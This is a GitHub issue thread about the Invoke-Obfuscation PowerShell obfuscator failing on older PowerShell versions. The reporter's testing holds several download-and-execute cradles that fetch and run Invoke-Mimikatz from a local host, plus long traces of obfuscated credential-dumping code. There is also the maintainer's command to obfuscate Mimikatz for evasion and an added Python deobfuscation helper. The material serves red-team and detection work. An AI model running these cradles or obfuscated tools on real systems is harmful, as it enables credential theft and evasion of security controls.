danielbohannon / Invoke-Obfuscation

PowerShell Obfuscator
Apache License 2.0

Obfuscated Scripts Incompatible on PS < 5.1 #10

Open byt3bl33d3r opened 7 years ago

byt3bl33d3r commented 7 years ago

Hey there! First off really awesome project!

As the title says, I've been noticing that most obfuscated PowerShell scripts (specifically PowerSploit scripts) seem to be incompatible on PowerShell < 5.1.

Here's some background on how/what I'm doing:

PS /home/byt3bl33d3r> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      6.0.0-alpha
PSEdition                      Core
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   3.0.0.0
GitCommitId                    Could not find file '/usr/lib/powershell/ubuntu.16.04-x64/powershell.version'.
CLRVersion
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1

PS /home/byt3bl33d3r> Import-Module Invoke-Obfuscation.psd1
PS /home/byt3bl33d3r> Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -Quiet

Works as expected \o/

Windows 10 (PS version 5.1)

Works as expected.

PS C:\Users\yomama3> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      5.1.14393.693
PSEdition                      Desktop
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.14393.693
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1

PS C:\Users\yomama3> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama3> iNVokE-mimIkATZ

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

---SNIP---

Windows 8.1 (PS version 4.0)

Here the IEX cradle works, when executing the cmdlet however it errors out.

PS C:\Users\yomama1> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      4.0
WSManStackVersion              3.0
SerializationVersion           1.1.0.1
CLRVersion                     4.0.30319.42000
BuildVersion                   6.3.9600.17400
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion      2.2

PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:433 char:3
+         ${vIRTu`AL`AllO`CEx} =  (&("{1}{0}{2}"-f 't-va','Ge','rIaBLE') ('1Re'+'fV')  - ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:463 char:3
+         ${v`irTua`lfRee} =   (&("{0}{2}{1}"-f'Va','e','riabL')  ("{0}{1}"-f'1','REFV') ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${v`irTUaL`PR`OTe`CT} =  (  &("{2}{1}{0}"-f'aBLe','I','VAr')  ("1Re"+"fV") -va ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:503 char:9
+         ${r`EadpRO`cessMemo`RY} =  (&("{0}{1}"-f'VarIaB','LE')  ("{0}{1}" -f'1', ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:508 char:9
+         ${cr`EATEReM`ot`et`H`ReaD} =   ( &("{3}{0}{2}{1}"-f 'ARI','le','AB','GeT ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "FromBase64String" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:2541 char:13
+             [Byte[]]${pe`BYtEs} = [Byte[]] ( &("{2}{1}{0}"-f'RiABle','t-Va','GE' ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Cannot index into a null array.
At line:2547 char:9
+         ${PeBy`T`Es}[0] = 0
+         ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:2548 char:9
+         ${pE`BYT`ES}[1] = 0
+         ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

iNvOKE-meMorYlOaDLIBraRY : Cannot bind argument to parameter 'pEBYTEs' because it is null.
At line:2552 char:102
+ ... mor') -PEBytes ${p`eb`YTES} -ExeArgs ${Exe`ArgS}
+                    ~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [iNvOKE-meMorYlOaDLIBraRY], ParameterBindingValidationExceptio
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,iNvOKE-meMorYlOaDLIBraRY

Cannot index into a null array.
At line:2563 char:3
+         ${p`EHa`NDLE} = ${pE`lO`A`de`dinfo}[0]
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:2564 char:3
+         ${r`EM`OT`e`PEHaNdLe} = ${p`el`oAD`edI`NFo}[1]
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : NullArray

PEHandle is null or IntPtr.Zero
At line:1060 char:4
+             throw ("{5}{0}{6}{4}{3}{1}{8}{2}{7}{9}"-f 'and','ull ','t','n','e is ','PEH', ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Zero:String) [], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero

Windows 7 (PS v2.0)

Here both the IEX cradle & cmdlet error out.

PS C:\Users\yomama> $PSVersionTable

Name                           Value
----                           -----
CLRVersion                     2.0.50727.5420
BuildVersion                   6.1.7601.17514
PSVersion                      2.0
WSManStackVersion              2.0
PSCompatibleVersions           {1.0, 2.0}
SerializationVersion           1.1.0.1
PSRemotingProtocolVersion      2.1

PS C:\Users\yomama> IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
At line:1 char:4
+ IEX <<<<  (New-Object Net.WebClient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
    + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

PS C:\Users\yomama> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Users\yomama> iNVokE-mimIkATZ
The variable '$cOMMaNd' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2657 char:35
+         ${e`xEA`RgS} = ${cOM`MaNd} <<<<
    + CategoryInfo          : InvalidOperation: (cOMMaNd:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$eXEArGS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2674 char:180
+         &("{2}{1}{0}{3}" -f 'Co','voke-','In','mmand') -ScriptBlock ${R`EmOTE
Sc`RIp`Tb`Lock} -ArgumentList @(${PEbYT`E`S64}, ${pE`BYt`ES32}, ("{0}{1}" -f 'V
','oid'), 0, "", ${e`XE`ArGS} <<<< )
    + CategoryInfo          : InvalidOperation: (eXEArGS:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2547 char:22
+         ${PeBy`T`Es}[ <<<< 0] = 0
    + CategoryInfo          : InvalidOperation: (0:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2548 char:22
+         ${pE`BYT`ES}[ <<<< 1] = 0
    + CategoryInfo          : InvalidOperation: (1:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

iNvOKE-meMorYlOaDLIBraRY : Cannot bind argument to parameter 'pEBYTEs' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2552 char:101
+             ${peLoa`dedIN`Fo} = &("{2}{1}{0}{5}{4}{3}" -f 'e','voke-M','In','
y','yLoadLibrar','mor') -PEBytes <<<<  ${p`eb`YTES} -ExeArgs ${Exe`ArgS}
    + CategoryInfo          : InvalidData: (:) [iNvOKE-meMorYlOaDLIBraRY], Par
   ameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
   owed,iNvOKE-meMorYlOaDLIBraRY

The variable '$pELoADedinFo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2558 char:26
+         if (${pELoAD`e`d`in`Fo} <<<<  -eq  (  &("{1}{0}"-f'Item','GEt-') ("{4
}{1}{0}{2}{3}"-f'e:dH','aBl','aQ','j','vari'))."Va`LUE"::"zE`Ro")
    + CategoryInfo          : InvalidOperation: (pELoADedinFo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pElOAdedinfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2563 char:38
+         ${p`EHa`NDLE} = ${pE`lO`A`de`dinfo} <<<< [0]
    + CategoryInfo          : InvalidOperation: (pElOAdedinfo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$peloADedINFo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2564 char:46
+         ${r`EM`OT`e`PEHaNdLe} = ${p`el`oAD`edI`NFo} <<<< [1]
    + CategoryInfo          : InvalidOperation: (peloADedINFo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Mimikatz.ps1:2674 char:4
+         & <<<< ("{2}{1}{0}{3}" -f 'Co','voke-','In','mmand') -ScriptBlock ${R
`EmOTESc`RIp`Tb`Lock} -ArgumentList @(${PEbYT`E`S64}, ${pE`BYt`ES32}, ("{0}{1}"
 -f 'V','oid'), 0, "", ${e`XE`ArGS})
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Ze
   ro:String) [Invoke-Command], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
   hell.Commands.InvokeCommandCommand

At first I thought it might be an issue with PowerShell on Linux, but I did the same thing on PowerShell on Windows with the same results, so this does seem to be a bug.

Let me know if you need any more information.

Cheers!

danielbohannon commented 7 years ago

Hi byt3bl33d3r, glad to hear you like this project! Thanks for submitting this bug report. It seems that string obfuscation for ParameterSetName fields in parameter bindings (but not DefaultParameterSetName fields) is causing errors when concatenation or even -f format operator reordering is performed (even if encapsulated with curly braces as a script block). I don't recall seeing this causing errors before for PS2 through PS5, but it definitely is not working at this point.

I just pushed an updated Out-ObfuscatedTokenCommand.ps1 file (e6b01edbb2ff8b3f6b571650020e88ad9fb002e7) that includes a string token fix as well as a variable token fix.

I am no longer seeing the above errors with Invoke-Mimikatz on either PS2 or PS5. Would you mind re-testing your scenario(s) and letting me know if this resolves your issues? Curious if there is more to the errors that you're seeing.

Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet
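
When triaging traces like the ones in this thread, the backtick-escaped names, `-f` format-operator reordering and string concatenation mentioned in the reply above can be folded back mechanically so the failing statement is readable. The following is an added example, not code from this thread or from Invoke-Obfuscation; the function and constant names are hypothetical, and the sample lines are copied from the error traces earlier in this issue.

```python
import re

# Added example; all names here are hypothetical, not part of Invoke-Obfuscation.
# Regex-based triage helper, not a full PowerShell tokenizer: literals with
# embedded or doubled quotes are not handled.
STR = r"""(?:'[^']*'|"[^"]*")"""                    # one quoted literal
TICK_SCOPE = re.compile(r'\$\{[^}]*\}|"[^"]*"')     # ${name} or "double-quoted"
# A backtick before a Windows PowerShell escape letter is meaningful and kept
# (PowerShell 6+ additionally defines `e and `u); any other backtick is a no-op.
TICK = re.compile(r"`(?![0abfnrtv])")
FORMAT = re.compile(rf"(?P<fmt>{STR})\s*-f\s*(?P<args>{STR}(?:\s*,\s*{STR})*)", re.I)
CONCAT = re.compile(rf"{STR}(?:\s*\+\s*{STR})+")

# Lines copied from the error traces in this issue ("..." is the console's
# own truncation marker).
SAMPLES = [
    r'''${vIRTu`AL`AllO`CEx} =  (&("{1}{0}{2}"-f 't-va','Ge','rIaBLE') ('1Re'+'fV')  - ...''',
    r'''${v`irTua`lfRee} =   (&("{0}{2}{1}"-f'Va','e','riabL')  ("{0}{1}"-f'1','REFV') ...''',
    r'''${r`EadpRO`cessMemo`RY} =  (&("{0}{1}"-f'VarIaB','LE')  ("{0}{1}" -f'1', ...''',
]


def _values(literals):
    """Unquote literals; None if a double-quoted one needs runtime expansion."""
    if any(lit[0] == '"' and re.search(r"[`$]", lit) for lit in literals):
        return None
    return [lit[1:-1] for lit in literals]


def _quote(text):
    """Re-emit a resolved value as a single-quoted PowerShell literal."""
    return "'" + text.replace("'", "''") + "'"


def deobfuscate(line):
    """Return (resolved_line, counts) for one line of obfuscated PowerShell."""
    counts = {"tick": 0, "format": 0, "concat": 0}

    def strip_ticks(m):
        text, n = TICK.subn("", m.group(0))
        counts["tick"] += n
        return text

    def fold_format(m):
        vals = _values([m.group("fmt")] + re.findall(STR, m.group("args")))
        if vals is None:
            return m.group(0)
        fmt, args = vals[0], vals[1:]
        idx = [int(i) for i in re.findall(r"\{(\d+)\}", fmt)]
        leftover = re.sub(r"\{\d+\}", "", fmt)
        # Leave the expression alone when the trace was truncated (an index
        # has no argument) or the format string is not a plain reorder.
        if not idx or max(idx) >= len(args) or "{" in leftover or "}" in leftover:
            return m.group(0)
        counts["format"] += 1
        return _quote(re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], fmt))

    def fold_concat(m):
        vals = _values(re.findall(STR, m.group(0)))
        if vals is None:
            return m.group(0)
        counts["concat"] += 1
        return _quote("".join(vals))

    line = TICK_SCOPE.sub(strip_ticks, line)
    line = FORMAT.sub(fold_format, line)   # -f binds tighter than +, so fold it first
    line = CONCAT.sub(fold_concat, line)
    return line, counts


if __name__ == "__main__":
    for sample in SAMPLES:
        resolved, found = deobfuscate(sample)
        print(found, resolved)
```

The per-line counts double as a rough indicator of how heavily a logged statement was token-obfuscated.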

byt3bl33d3r commented 7 years ago

Just re-tested, now seeing the following errors, let me know if I'm missing something.

Windows 7 (PS v2)

IEX cradle now throws a different error, running the cmdlet still errors out.

PS C:\Users\yomama> IEX (New-Object Net.Webclient).DownloadString('http://192.16
8.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Missing closing ')' in expression.
At line:1 char:4
+ IEX <<<<  (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invo
ke-Mimikatz.ps1')
    + CategoryInfo          : ParserError: (CloseParenToken:TokenId) [Invoke-E
   xpression], ParseException
    + FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.Powe
   rShell.Commands.InvokeExpressionCommand

PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Import-Module .\test.ps1
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Invoke-Mimikatz
The variable '$COmmAND' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2657 char:35
+         ${E`x`EARgs} = ${COmm`AND} <<<<
    + CategoryInfo          : InvalidOperation: (COmmAND:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$eXEaRgS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:173
+         &("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motESc`RIP
t`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id','Vo'
), 0, "", ${eX`Ea`RgS} <<<< )
    + CategoryInfo          : InvalidOperation: (eXEaRgS:Token) [], RuntimeExc
   eption
    + FullyQualifiedErrorId : VariableIsUndefined

Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2547 char:22
+         ${pEB`Y`Tes}[ <<<< 0] = 0
    + CategoryInfo          : InvalidOperation: (0:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2548 char:22
+         ${peBY`T`Es}[ <<<< 1] = 0
    + CategoryInfo          : InvalidOperation: (1:Int32) [], RuntimeException
    + FullyQualifiedErrorId : IndexOutOfRange

inVoke-mEMORYLOaDLiBraRY : Cannot bind argument to parameter 'PeBYteS' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2552 char:94
+             ${Pel`oAdeD`iNfo} = &("{2}{3}{0}{1}{4}" -f'-Memo','ry','Invo','ke
','LoadLibrary') -PEBytes <<<<  ${pe`By`TEs} -ExeArgs ${e`xeAR`gs}
    + CategoryInfo          : InvalidData: (:) [inVoke-mEMORYLOaDLiBraRY], Par
   ameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
   owed,inVoke-mEMORYLOaDLiBraRY

The variable '$PeLOADEDiNfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2558 char:25
+         if (${PeL`O`ADEDi`Nfo} <<<<  -eq  ${I1`qo}::"z`eRo")
    + CategoryInfo          : InvalidOperation: (PeLOADEDiNfo:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pELoADEDinFO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2563 char:36
+         ${PE`han`Dle} = ${p`E`LoADEDinFO} <<<< [0]
    + CategoryInfo          : InvalidOperation: (pELoADEDinFO:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

The variable '$pELOaDediNfO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2564 char:44
+         ${Rem`O`TepEhA`NDle} = ${pE`LOaDed`i`NfO} <<<< [1]
    + CategoryInfo          : InvalidOperation: (pELOaDediNfO:Token) [], Runti
   meException
    + FullyQualifiedErrorId : VariableIsUndefined

Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:4
+         & <<<< ("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motE
Sc`RIPt`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id
','Vo'), 0, "", ${eX`Ea`RgS})
    + CategoryInfo          : OperationStopped: (PEHandle is null or IntPtr.Ze
   ro:String) [Invoke-Command], RuntimeException
    + FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
   hell.Commands.InvokeCommandCommand

Windows 8.1 (PS v4)

Seems to be the same error as last time.

PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+         ${vIR`T`UalALLOC} =  (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+         ${m`E`mCPy} =   (  varIabLE  ("{1}{0}"-f 'Fpq','76')  -va )::("{4}{5}{0}{3}{2} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+         ${lOAd`L`I`BRARy} =   ( geT-VaRIaBLe ("76"+"fpQ")  -ValueoNl  )::("{6}{1}{3}{5 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+         ${V`IRTu`AlfRE`EEX} =   (  geT-VARiaBLe  ("{1}{0}" -f'PQ','76F')  -vaL  )::("{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${virTUA`LP`R`oTE`CT} =   (  GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+         ${cREAtET`HRE`Ad} =  (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+         ${vIR`T`UalALLOC} =  (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+         ${m`E`mCPy} =   (  varIabLE  ("{1}{0}"-f 'Fpq','76')  -va )::("{4}{5}{0}{3}{2} ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+         ${lOAd`L`I`BRARy} =   ( geT-VaRIaBLe ("76"+"fpQ")  -ValueoNl  )::("{6}{1}{3}{5 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+         ${V`IRTu`AlfRE`EEX} =   (  geT-VARiaBLe  ("{1}{0}" -f'PQ','76F')  -vaL  )::("{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+         ${virTUA`LP`R`oTE`CT} =   (  GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+         ${cREAtET`HRE`Ad} =  (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

You cannot call a method on a null-valued expression.
At line:2212 char:5
+                 ${P`eHAN`dLe} = ${w`in`32fun`cTions}."vIRt`Ua`LaLl`oC"."i`Nv`oKe"(${loAd`AD` ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

